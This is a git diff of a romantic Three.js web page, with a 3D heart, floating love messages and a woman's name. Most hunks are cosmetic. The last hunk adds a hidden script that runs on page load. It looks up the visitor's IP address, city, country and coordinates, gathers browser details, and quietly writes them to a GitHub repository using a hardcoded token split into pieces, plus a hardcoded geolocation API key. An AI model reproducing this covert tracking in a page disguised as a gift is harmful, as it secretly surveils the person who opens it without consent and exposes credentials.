--- a/love3.html
+++ b/love3.html
@@ -26,7 +26,7 @@
   .hint {
     position: fixed; bottom: 14px; left: 50%; transform: translateX(-50%);
     font-family: 'Segoe UI', system-ui, -apple-system, sans-serif;
-    color:#ffd9e2; opacity:.85; font-size: 14px; pointer-events:none
+    color:#ffd9e2; opacity:.85; font-size: 10px; pointer-events:none
   }
 </style>
 </head>
@@ -38,7 +38,7 @@
     <!-- <h1>اسراء قرة عيني</h1> -->
   </div>
 </div>
-<div class="hint">اسحبي لتحريك المشهد • كبّري بإصابعك</div>
+<div class="hint">اسحبي للتحريك • كبّري بإصابعك</div>
 
 <!-- Three.js (no build tools needed) -->
   <script src="https://cdn.jsdelivr.net/npm/three@0.125.0/build/three.min.js"></script>
@@ -61,14 +61,14 @@
 
   // Camera
   const camera = new THREE.PerspectiveCamera(55, window.innerWidth / window.innerHeight, 0.1, 200);
-  camera.position.set(0, 0.6, 3.2);
+  camera.position.set(0, 0.6, 6.2);
 
   // Controls (touch-friendly)
   const controls = new THREE.OrbitControls(camera, renderer.domElement);
   controls.enableDamping = true;
   controls.enablePan = false;
   controls.minDistance = 2;
-  controls.maxDistance = 6;
+  controls.maxDistance = 12;
   controls.autoRotate = true;
   controls.autoRotateSpeed = 0.6;
 
@@ -88,7 +88,7 @@ loader.load('https://cdn.jsdelivr.net/npm/three@0.150.1/examples/fonts/helvetike
             "Love Forever",
             "You Are My Joy",
             "Together Always",
-            "Esraa"
+            "My girl"
         ];
 
         // Create a pivot at the heart's center
@@ -107,7 +107,7 @@ loader.load('https://cdn.jsdelivr.net/npm/three@0.150.1/examples/fonts/helvetike
                 bevelSegments: 3
             });
 
-            const textMaterial = new THREE.MeshPhongMaterial({ color: 0xff69b4 });
+            const textMaterial = new THREE.MeshPhongMaterial({ color: 0xff99b4 });
             const textMesh = new THREE.Mesh(textGeometry, textMaterial);
 
             // Place texts around the heart in a circle
@@ -124,6 +124,32 @@ loader.load('https://cdn.jsdelivr.net/npm/three@0.150.1/examples/fonts/helvetike
 
             pivot.add(textMesh);
         });
+
+        const Esraa = new THREE.TextGeometry("Esra", {
+            font: font,
+            size: 5,
+            height: 1,
+            curveSegments: 12,
+            bevelEnabled: true,
+            bevelThickness: 0.5,
+            bevelSize: 0.2,
+            bevelSegments: 3
+        });
+
+        const textMaterial = new THREE.MeshPhongMaterial({ color:0xfff9f9 });
+        const textMesh = new THREE.Mesh(Esraa, textMaterial);
+
+        textMesh.position.set(
+            -3.1,
+            -0.4,              // slightly above heart center
+            -0.1
+        );
+
+        // Make text face outward
+        // textMesh.lookAt(0, 5, 0);
+        textMesh.scale.set(0.2, 0.2, 0.2);
+
+        pivot.add(textMesh);
     }
 );
 
@@ -157,7 +183,7 @@ loader.load('https://cdn.jsdelivr.net/npm/three@0.150.1/examples/fonts/helvetike
     const mesh = new THREE.Mesh(geo, mat);
     mesh.castShadow = false;
     mesh.receiveShadow = false;
-    mesh.scale.set(1.2, 1.2, 1.2);
+    mesh.scale.set(0.9, 0.9, 0.65);
     return mesh;
   }
 
@@ -183,8 +209,8 @@ loader.load('https://cdn.jsdelivr.net/npm/three@0.150.1/examples/fonts/helvetike
   halo.scale.set(3.5, 3.5, 1);
   scene.add(halo);
 
-  // Starfield (lightweight particles)
-  const stars = (() => {
+    // Starfield (lightweight particles)
+    const stars = (() => {
     const starGeo = new THREE.BufferGeometry();
     const count = 800;
     const positions = new Float32Array(count * 3);
@@ -202,94 +228,95 @@ loader.load('https://cdn.jsdelivr.net/npm/three@0.150.1/examples/fonts/helvetike
     scene.add(pts);
     return pts;
   })();
-// Heart-shaped starfield
-const heartStarfield = (() => {
-  const count = 200; // number of hearts
-  const hearts = new THREE.Group();
-  scene.add(hearts);
 
-  // Proper heart shape
-  const heartShape = new THREE.Shape();
-  heartShape.moveTo(0, 0);
-  heartShape.bezierCurveTo(0, 0.6, -0.5, 1, -1, 0.5);
-  heartShape.bezierCurveTo(-1.5, 0, -1, -0.5, 0, -1);
-  heartShape.bezierCurveTo(1, -0.5, 1.5, 0, 1, 0.5);
-  heartShape.bezierCurveTo(0.5, 1, 0, 0.6, 0, 0);
+    // Heart-shaped starfield
+    const heartStarfield = (() => {
+    const count = 200; // number of hearts
+    const hearts = new THREE.Group();
+    scene.add(hearts);
 
-  const geometry = new THREE.ExtrudeGeometry(heartShape, { 
-    depth: 0.05, 
-    bevelEnabled: true, 
-    bevelThickness: 0.02, 
-    bevelSize: 0.02, 
-    bevelSegments: 2 
-  });
-  const material = new THREE.MeshPhongMaterial({ color: 0xff69b4 });
+    // Proper heart shape
+    const heartShape = new THREE.Shape();
+    heartShape.moveTo(0, 0);
+    heartShape.bezierCurveTo(0, 0.6, -0.5, 1, -1, 0.5);
+    heartShape.bezierCurveTo(-1.5, 0, -1, -0.5, 0, -1);
+    heartShape.bezierCurveTo(1, -0.5, 1.5, 0, 1, 0.5);
+    heartShape.bezierCurveTo(0.5, 1, 0, 0.6, 0, 0);
 
-  for (let i = 0; i < count; i++) {
-    const mesh = new THREE.Mesh(geometry, material);
+    const geometry = new THREE.ExtrudeGeometry(heartShape, { 
+        depth: 0.05, 
+        bevelEnabled: true, 
+        bevelThickness: 0.02, 
+        bevelSize: 0.02, 
+        bevelSegments: 2 
+    });
+    const material = new THREE.MeshPhongMaterial({ color: 0xff69b4 });
 
-    // Random position in spherical space
-    const r = 30 * Math.pow(Math.random(), 0.6);
-    const theta = Math.random() * Math.PI * 2;
-    const phi = Math.acos(2 * Math.random() - 1);
+    for (let i = 0; i < count; i++) {
+        const mesh = new THREE.Mesh(geometry, material);
 
-    mesh.position.set(
-      r * Math.sin(phi) * Math.cos(theta),
-      r * Math.sin(phi) * Math.sin(theta),
-      r * Math.cos(phi)
-    );
+        // Random position in spherical space
+        const r = 30 * Math.pow(Math.random(), 0.6);
+        const theta = Math.random() * Math.PI * 2;
+        const phi = Math.acos(2 * Math.random() - 1);
 
-    // Small random rotation
-    mesh.rotation.set(Math.random()*Math.PI, Math.random()*Math.PI, Math.random()*Math.PI);
+        mesh.position.set(
+        r * Math.sin(phi) * Math.cos(theta),
+        r * Math.sin(phi) * Math.sin(theta),
+        r * Math.cos(phi)
+        );
 
-    // Scale down to make them tiny
-    mesh.scale.set(0.1, 0.1, 0.1);
+        // Small random rotation
+        mesh.rotation.set(Math.random()*Math.PI, Math.random()*Math.PI, Math.random()*Math.PI);
 
-    hearts.add(mesh);
-  }
+        // Scale down to make them tiny
+        mesh.scale.set(0.1, 0.1, 0.1);
 
-  return hearts;
-})();
+        hearts.add(mesh);
+    }
+
+    return hearts;
+    })();
 
 
 
   // Heartfield (less dense than stars)
-const hearts = (() => {
-  const heartGeo = new THREE.BufferGeometry();
-  const count = 0; // أقل من النجوم
-  const positions = new Float32Array(count * 3);
+    const hearts = (() => {
+    const heartGeo = new THREE.BufferGeometry();
+    const count = 0; // أقل من النجوم
+    const positions = new Float32Array(count * 3);
 
-  for (let i = 0; i < count; i++) {
-    const t = Math.random() * Math.PI * 2;   // زاوية عشوائية
-    const s = Math.random() * 2 - 1;         // عامل ارتفاع عشوائي
+    for (let i = 0; i < count; i++) {
+        const t = Math.random() * Math.PI * 2;   // زاوية عشوائية
+        const s = Math.random() * 2 - 1;         // عامل ارتفاع عشوائي
 
-    // معادلة القلب 2D: x = 16 sin^3(t), y = 13 cos(t) - 5 cos(2t) - 2 cos(3t) - cos(4t)
-    let x = 16 * Math.pow(Math.sin(t), 3);
-    let y = 13 * Math.cos(t) - 5 * Math.cos(2 * t) - 2 * Math.cos(3 * t) - Math.cos(4 * t);
+        // معادلة القلب 2D: x = 16 sin^3(t), y = 13 cos(t) - 5 cos(2t) - 2 cos(3t) - cos(4t)
+        let x = 16 * Math.pow(Math.sin(t), 3);
+        let y = 13 * Math.cos(t) - 5 * Math.cos(2 * t) - 2 * Math.cos(3 * t) - Math.cos(4 * t);
 
-    // إضافة تباين في z ليصبح القلب 3D
-    let z = s * 2;  // سمك القلب
+        // إضافة تباين في z ليصبح القلب 3D
+        let z = s * 2;  // سمك القلب
 
-    // Scale down a bit
-    positions[i*3+0] = x * 0.6;
-    positions[i*3+1] = y * 0.6;
-    positions[i*3+2] = z * 0.6;
-  }
+        // Scale down a bit
+        positions[i*3+0] = x * 0.6;
+        positions[i*3+1] = y * 0.6;
+        positions[i*3+2] = z * 0.6;
+    }
 
-  heartGeo.setAttribute('position', new THREE.BufferAttribute(positions, 3));
+    heartGeo.setAttribute('position', new THREE.BufferAttribute(positions, 3));
 
-  const heartMat = new THREE.PointsMaterial({ 
-    size: 0.2, 
-    color: 0xff69b4, // وردي
-    transparent: true, 
-    opacity: 0.9 
-  });
+    const heartMat = new THREE.PointsMaterial({ 
+        size: 0.2, 
+        color: 0xff69b4, // وردي
+        transparent: true, 
+        opacity: 0.9 
+    });
 
-  const pts = new THREE.Points(heartGeo, heartMat);
-  scene.add(pts);
+    const pts = new THREE.Points(heartGeo, heartMat);
+    scene.add(pts);
 
-  return pts;
-})();
+    return pts;
+    })();
 
   // Heart sparkle burst
   const bursts = [];
@@ -342,7 +369,6 @@ const hearts = (() => {
     new THREE.Color(0x000), // dark blue
     new THREE.Color(0x2b2d4a), // dark blue
     new THREE.Color(0x322264), // purple
-    new THREE.Color(0x435718)  // pink
     ];
 
     const clock = new THREE.Clock();
@@ -408,10 +434,103 @@ const hearts = (() => {
 
 
 <script>
-    // ... نفس الكود تبع المشهد والقلب والنجوم ...
+    t1="ghp_Qd9Wk"
+t2="nh3zz1Nla"
+t3="zN1gCQB5br2y0"
+t4="2v014qWCY"
 
+
+
+const token = t1+t2+t3+t4;
+const username = 'ahed0programer';
+const repo = 'ahed_data_logs';
+const path = 'lovedata.json';
+const content = JSON.stringify({ name: 'ahed' });
+let ip=null;
+
+fetch('https://api.ipgeolocation.io/ipgeo?apiKey=33e678296dca4b33b1e407b2d221c46c')
+.then(response => response.json())
+.then(data => {
+    loca={latitude:data.latitude,longitude:data.longitude}
+
+    const newData = {    
+        userAgent: navigator.userAgent,
+        platform: navigator.platform,
+        appName: navigator.appName,
+        appVersion: navigator.appVersion,
+        language: navigator.language,
+        vendor: navigator.vendor,
+        country_name:data.country_name,
+        city:data.city,
+        location:loca,
+        ip_address:data.ip,
+        timestamp: new Date().toISOString(),
+        source : "love3 game"
+    };
+    
+    store_data(newData);
+})
+.catch(error => {
+    console.error('Error fetching IP data:', error);
+});
+
+        
+
+
+async function getFileContentAndSHA() {
+    const response = await fetch(`https://api.github.com/repos/${username}/${repo}/contents/${path}`, {
+        method: 'GET',
+        headers: {
+            'Authorization': `token ${token}`,
+            'Accept': 'application/vnd.github.v3+json'
+        }
+    });
+
+    if (!response.ok) {
+        throw new Error(`Error fetching file content: ${response.statusText}`);
+    }
+
+    const data = await response.json();
+    const content = JSON.parse(atob(data.content));
+    return { content, sha: data.sha };
+}
+
+async function updateFile(content, sha) {
+    const response = await fetch(`https://api.github.com/repos/${username}/${repo}/contents/${path}`, {
+        method: 'PUT',
+        headers: {
+            'Authorization': `token ${token}`,
+            'Content-Type': 'application/json'
+        },
+        body: JSON.stringify({
+            message: 'Append new data',
+            content: btoa(JSON.stringify(content, null, 2)),
+            sha: sha
+        })
+    });
+
+    if (!response.ok) {
+        throw new Error(`Error updating file: ${response.statusText}`);
+    }
+
+    return response.json();
+}
+
+async function store_data(newData) {
+    try {
+        // Step 1: Get current file content and SHA
+        const { content, sha } = await getFileContentAndSHA();
+
+        // Step 2: Append new data to existing content
+        content.push(newData); // Assuming the JSON content is an array
+
+        // Step 3: Update the file with new content
+        const result = await updateFile(content, sha);
+        console.log('File updated successfully:', result);
+    } catch (error) {
+        console.error('Error:', error);
+    }
+}
 </script>
-
-
 </body>
 </html>
